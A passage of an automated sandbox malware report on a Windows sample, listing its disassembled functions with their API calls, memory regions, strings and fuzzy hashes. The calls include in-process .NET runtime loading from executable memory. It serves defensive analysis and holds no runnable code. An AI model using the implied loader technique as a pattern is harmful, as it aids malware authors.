                                • VariantChangeType.OLEAUT32 ref: 00412A22
                                • VariantClear.OLEAUT32(?), ref: 00412A44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeCopyFreeH_prolog3StringTypelstrlen
                                • String ID: On4399Login$Yr?
                                • API String ID: 3003656826-4245010174
                                • Opcode ID: 0c73eddbf2bcf25958b6e0e781ce6a07445fd9abe0e3f12cfb96ee8b58a3d5cd
                                • Instruction ID: 5d222733b6dc8b3f54be17e695bbb7c01374b1a4a9ed15aaa50285a240750d4c
                                • Opcode Fuzzy Hash: 0c73eddbf2bcf25958b6e0e781ce6a07445fd9abe0e3f12cfb96ee8b58a3d5cd
                                • Instruction Fuzzy Hash: FD216B71208701AFD310DF28CC46B5BB7E9FF89724F008A2DF595D7290EB78A9048B96
                                Function 00405840 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00405856
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • _memmove.LIBCMT ref: 00405894
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                • String ID: invalid string position$Yr?$Yr?
                                • API String ID: 1785806476-1108046380
                                • Opcode ID: 7dc52565d4be457e8fc316c6bbb6301fbb3776693761ba892fb07848e6a5fcc3
                                • Instruction ID: f1b391fdf39913b613b2a6ca5ff4fbe537380ea5887ccbfe4d44d873e70c66cd
                                • Opcode Fuzzy Hash: 7dc52565d4be457e8fc316c6bbb6301fbb3776693761ba892fb07848e6a5fcc3
                                • Instruction Fuzzy Hash: 6D11C633700A148BC724EE6DD98086BB3AAEFD5755320893FD842DB654DA71D826CBD8
                                Function 004036A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • DeleteCriticalSection.KERNEL32(0073EFB8,3F7259E2), ref: 0040372B
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403751
                                  • Part of subcall function 00403770: EnterCriticalSection.KERNEL32(0073EFB8,3F7259E2,?,?,?,?,?,?,00000000,0067E880,000000FF,?,00403623,0000000E), ref: 004037B0
                                  • Part of subcall function 00403770: LeaveCriticalSection.KERNEL32(?), ref: 0040387B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CriticalSection$DeleteEnterIos_base_dtorLeavestd::ios_base::_
                                • String ID: --------------------------------------$Close the log file$ps
                                • API String ID: 116376633-1934898415
                                • Opcode ID: 9fbfd5a8eb769af68ec267b9150065a5c97c4332b75b4e6040aa01bb64254486
                                • Instruction ID: 2ecc6842cfc27d3fb62b39c050e3c8f357bb2fe6eebd545a536de204dcc3158d
                                • Opcode Fuzzy Hash: 9fbfd5a8eb769af68ec267b9150065a5c97c4332b75b4e6040aa01bb64254486
                                • Instruction Fuzzy Hash: C8113AB0A04209EFE740DF55DC45B1DBBA9EB4471AF00463FF514A73C1DBBC99048A19
                                Function 0040DD90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • LoadResource.KERNEL32(00000000,Yr?,00000000,?,?,0040DEFD,00000000,00000000,Yr?,?,00000006,?,?,?,?,0040E0FE), ref: 0040DD9D
                                • LockResource.KERNEL32(00000000,Yr?,?,?,0040DEFD,00000000,00000000,Yr?,?,00000006,?,?,?,?,0040E0FE,00000000), ref: 0040DDAD
                                • SizeofResource.KERNEL32(00000000,Yr?,?,?,0040DEFD,00000000,00000000,Yr?,?,00000006,?,?,?,?,0040E0FE,00000000), ref: 0040DDBB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Resource$LoadLockSizeof
                                • String ID: Yr?$Yr?
                                • API String ID: 2853612939-3123445955
                                • Opcode ID: 43cee5755cfeead7888a9bf2a4f97ff97a4c0a724ef7578bce4ec5899c7f0dee
                                • Instruction ID: 279a50f6f855fab2f08e0d6fd0f2a1dcf541844af4ac33e8fe5017e422f5ad86
                                • Opcode Fuzzy Hash: 43cee5755cfeead7888a9bf2a4f97ff97a4c0a724ef7578bce4ec5899c7f0dee
                                • Instruction Fuzzy Hash: 2CF08137A041256BCB306BA9FC448ABB79CEEC177A7104537F94AE6240E538984486A9
                                Function 004252E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(0073EA24,00000000), ref: 00425303
                                • CreateCompatibleDC.GDI32(00000000), ref: 00425315
                                • SelectObject.GDI32(00000000,?), ref: 00425323
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CompatibleCreateExchangeInterlockedObjectSelect
                                • String ID: $s$4s
                                • API String ID: 3535841225-2355125407
                                • Opcode ID: af39fbe5fe79b01b79704621441017bdfe42500967b292a18b7a69577aee8cc6
                                • Instruction ID: a008aa4b5d13991f7c075ac082593537b6fc1bb36f1273c765e7a505121c0516
                                • Opcode Fuzzy Hash: af39fbe5fe79b01b79704621441017bdfe42500967b292a18b7a69577aee8cc6
                                • Instruction Fuzzy Hash: CEF08972910A12BBD710CB59FC547A6B3E9FB0C321F941226E908D3510D774F8508794
                                Function 00425340 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • SelectObject.GDI32(?,?), ref: 00425352
                                • InterlockedExchange.KERNEL32(0073EA24,?), ref: 00425368
                                • DeleteDC.GDI32(00000000), ref: 0042537A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: DeleteExchangeInterlockedObjectSelect
                                • String ID: $s$4s
                                • API String ID: 3299122373-2355125407
                                • Opcode ID: 792cba1ebb77e0113482869a1f5ac12fb08f8581ba4ba3c309dfc212fdb726b8
                                • Instruction ID: 3b2aef00af78a40e224edbe4aca8cb49a209f71b646a823499b486a80b901ec0
                                • Opcode Fuzzy Hash: 792cba1ebb77e0113482869a1f5ac12fb08f8581ba4ba3c309dfc212fdb726b8
                                • Instruction Fuzzy Hash: CEE065B2600110ABDB149F59FC8CDA777ACFB483A47512266EC08D7316D775DC40CBA4
                                Function 026D36F1 Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 026D36F8
                                • CLRCreateInstance.MSCOREE(1001A868,1001A858,?), ref: 026D3712
                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 026D3816
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 026D3845
                                • SysAllocString.OLEAUT32(?), ref: 026D38F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                • String ID:
                                • API String ID: 3666180938-0
                                • Opcode ID: 0679afa7e42db6914c611615644c86f0fb952cca8b1215813b4ac9644e9faab1
                                • Instruction ID: a5961bb53088cef8a34368327d5eabb4563e22d9eb4a0ef10a5f9ac896c7bdc5
                                • Opcode Fuzzy Hash: 0679afa7e42db6914c611615644c86f0fb952cca8b1215813b4ac9644e9faab1
                                • Instruction Fuzzy Hash: C9A1F7B1E00249AFDB00DFE4CC889AEBBBAFF49308B5445ADE605EB251D7319946CF51
                                Function 100036ED Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 100036F4
                                • CLRCreateInstance.MSCOREE(1001A868,1001A858,?), ref: 1000370E
                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 10003812
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 10003841
                                • SysAllocString.OLEAUT32(?), ref: 100038F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                • String ID:
                                • API String ID: 3666180938-0
                                • Opcode ID: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                • Instruction ID: 4c23db85811c87e403490fbd8194970e45e724dfb527cc97901a904ff1b24d94
                                • Opcode Fuzzy Hash: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                • Instruction Fuzzy Hash: A6A14AB1E00249AFEB01CFE4CC889AEBBB9FF49344F508469E209EB251C7719D46CB50
                                Function 00410050 Relevance: 7.7, APIs: 5, Instructions: 156COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memmove_memset
                                • String ID:
                                • API String ID: 3555123492-0
                                • Opcode ID: 764befa4bf2e314dd1f73a8c7f2d56884837161f691c1f005e55797678d8d090
                                • Instruction ID: 8639b30e83a7fb94bc972bc6e8a9cd534288a9ebbad313e0c7a912072ab93095
                                • Opcode Fuzzy Hash: 764befa4bf2e314dd1f73a8c7f2d56884837161f691c1f005e55797678d8d090
                                • Instruction Fuzzy Hash: 67412B36A00608ABD720CF58D882AEBF799EF95314F14456FEC49C7301E6B6E994C394
                                Function 026E3FEA Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 026E3FF8
                                  • Part of subcall function 026DB4CF: __FF_MSGBANNER.LIBCMT ref: 026DB4E8
                                  • Part of subcall function 026DB4CF: __NMSG_WRITE.LIBCMT ref: 026DB4EF
                                  • Part of subcall function 026DB4CF: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 026DB514
                                • _free.LIBCMT ref: 026E400B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocateHeap_free_malloc
                                • String ID:
                                • API String ID: 1020059152-0
                                • Opcode ID: 81d65614e0b6db376356ac8b77cde15ec8576bf147855c74108ac56880b648b2
                                • Instruction ID: 90e2ec2c9c63ce18dc5bed000377610526a159341fc50536c1dab4b3f2b48a8d
                                • Opcode Fuzzy Hash: 81d65614e0b6db376356ac8b77cde15ec8576bf147855c74108ac56880b648b2
                                • Instruction Fuzzy Hash: 5D11E733C06698ABCF327F749C047993776AF843A8B21443DE84B8A690DF34C542CB54
                                Function 10013FE6 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 10013FF4
                                  • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                  • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                  • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                • _free.LIBCMT ref: 10014007
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocateHeap_free_malloc
                                • String ID:
                                • API String ID: 1020059152-0
                                • Opcode ID: 1ab232e044aed3252399bea0ee6c793a0e290cd9f57a7279a257bb48d984a3d0
                                • Instruction ID: 70ff08b1941979eeaa78273ecc160b3e30a6ac04d156f3026e39b441a1728ba6
                                • Opcode Fuzzy Hash: 1ab232e044aed3252399bea0ee6c793a0e290cd9f57a7279a257bb48d984a3d0
                                • Instruction Fuzzy Hash: 67119836804625ABEB23EF75980565D37A4EF482F0B234426FE589E1A1DF34D98157A0
                                Function 00402270 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004022A2
                                  • Part of subcall function 0065C042: _setlocale.LIBCMT ref: 0065C054
                                • _free.LIBCMT ref: 004022B4
                                  • Part of subcall function 00638E31: HeapFree.KERNEL32(00000000,00000000,?,0040201B,?,3F7259E2), ref: 00638E47
                                • _free.LIBCMT ref: 004022C7
                                • _free.LIBCMT ref: 004022DA
                                • _free.LIBCMT ref: 004022ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$FreeHeapLocinfo::_Locinfo_dtor_setlocalestd::_
                                • String ID:
                                • API String ID: 1034197179-0
                                • Opcode ID: ac469826c7b5778c2480ed9d8d21304f84577ce16e330bacff609af96e54664c
                                • Instruction ID: ed5dcfbf73a07c69821e4bf8393dc523f7ba6170a8c7996168ef0bd254403016
                                • Opcode Fuzzy Hash: ac469826c7b5778c2480ed9d8d21304f84577ce16e330bacff609af96e54664c
                                • Instruction Fuzzy Hash: 3B1190B1900700AFCA20DF599D45A5BF7EAEB40710F144A2EF416D3780E7B5ED048A95
                                Function 026DAB81 Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 026DABAF
                                • _free.LIBCMT ref: 026DABC2
                                • GetLastError.KERNEL32 ref: 026DABCA
                                • SysAllocString.OLEAUT32(00000000), ref: 026DABE5
                                • _free.LIBCMT ref: 026DABF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                • String ID:
                                • API String ID: 3133011222-0
                                • Opcode ID: c326120811b6e8470c5a8fc5c392992969c03a7f404586a7725627625e7063b9
                                • Instruction ID: 1ce2143835eda68ff436161b7f49b77b324de8ecd55c81a69f082e794c3c9589
                                • Opcode Fuzzy Hash: c326120811b6e8470c5a8fc5c392992969c03a7f404586a7725627625e7063b9
                                • Instruction Fuzzy Hash: 5411E9B2D0420CABDB10AFF48D85BAEB766EF48375F10453DE906B7280DA799D418A54
                                Function 1000AB7D Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000ABAB
                                • _free.LIBCMT ref: 1000ABBE
                                • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000ABC6
                                • SysAllocString.OLEAUT32(00000000), ref: 1000ABE1
                                • _free.LIBCMT ref: 1000ABF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                • String ID:
                                • API String ID: 3133011222-0
                                • Opcode ID: c1eece032195694a8002d5fb2468b5fdb935dc54d1e59116945ad4e093ffb3a7
                                • Instruction ID: d1de8894a8780e0054a3ce0d446c8da7c10fb7330143512198e40d387101a589
                                • Opcode Fuzzy Hash: c1eece032195694a8002d5fb2468b5fdb935dc54d1e59116945ad4e093ffb3a7
                                • Instruction Fuzzy Hash: 1611E977D00219ABF710DFA08C82F9EB765EF592E1F114239FC06B7246E678FA808651
                                Function 005A0D3F Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNEL32(?,?,75FD6BA0,00000000,006DDE54,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000), ref: 005A0D63
                                • LoadResource.KERNEL32(?,00000000,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9,00000004), ref: 005A0D79
                                • LockResource.KERNEL32(00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9,00000004), ref: 005A0D88
                                • FreeResource.KERNEL32(?,00000000,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014), ref: 005A0D99
                                • SizeofResource.KERNEL32(?,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9), ref: 005A0DA6
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLockSizeof
                                • String ID:
                                • API String ID: 4159136517-0
                                • Opcode ID: 060403b0df980fa2bc26eddb00098e55fd3a1d70780271815c09f747c1f5bba0
                                • Instruction ID: bf9dffb8b0351f1a12464e4b0dfc8b530dce4cae73df35a4009b91ad96d594c9
                                • Opcode Fuzzy Hash: 060403b0df980fa2bc26eddb00098e55fd3a1d70780271815c09f747c1f5bba0
                                • Instruction Fuzzy Hash: 7F017C3B510A22BB8B215BA59C5889F7FADFF86764705A114F90593250EA30ED008BA0
                                Function 026E0E22 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __CreateFrameInfo.LIBCMT ref: 026E0E4A
                                  • Part of subcall function 026DCA1F: __getptd.LIBCMT ref: 026DCA2D
                                  • Part of subcall function 026DCA1F: __getptd.LIBCMT ref: 026DCA3B
                                • __getptd.LIBCMT ref: 026E0E54
                                  • Part of subcall function 026DEA0D: __getptd_noexit.LIBCMT ref: 026DEA10
                                  • Part of subcall function 026DEA0D: __amsg_exit.LIBCMT ref: 026DEA1D
                                • __getptd.LIBCMT ref: 026E0E62
                                • __getptd.LIBCMT ref: 026E0E70
                                • __getptd.LIBCMT ref: 026E0E7B
                                  • Part of subcall function 026DCAC4: __CallSettingFrame@12.LIBCMT ref: 026DCB10
                                  • Part of subcall function 026E0F48: __getptd.LIBCMT ref: 026E0F57
                                  • Part of subcall function 026E0F48: __getptd.LIBCMT ref: 026E0F65
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                • String ID:
                                • API String ID: 3282538202-0
                                • Opcode ID: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                • Instruction ID: 7aad94a101073ae7b0765a3688403cf5e31f817caa0f4929237807e97850b09f
                                • Opcode Fuzzy Hash: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                • Instruction Fuzzy Hash: 1211D4B1C0024EDFDF00EFA4C948AAD7BB2FF08314F14806AE815AB251DB799A119F58
                                Function 10010E1E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __CreateFrameInfo.LIBCMT ref: 10010E46
                                  • Part of subcall function 1000CA1B: __getptd.LIBCMT ref: 1000CA29
                                  • Part of subcall function 1000CA1B: __getptd.LIBCMT ref: 1000CA37
                                • __getptd.LIBCMT ref: 10010E50
                                  • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                  • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                • __getptd.LIBCMT ref: 10010E5E
                                • __getptd.LIBCMT ref: 10010E6C
                                • __getptd.LIBCMT ref: 10010E77
                                  • Part of subcall function 1000CAC0: __CallSettingFrame@12.LIBCMT ref: 1000CB0C
                                  • Part of subcall function 10010F44: __getptd.LIBCMT ref: 10010F53
                                  • Part of subcall function 10010F44: __getptd.LIBCMT ref: 10010F61
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
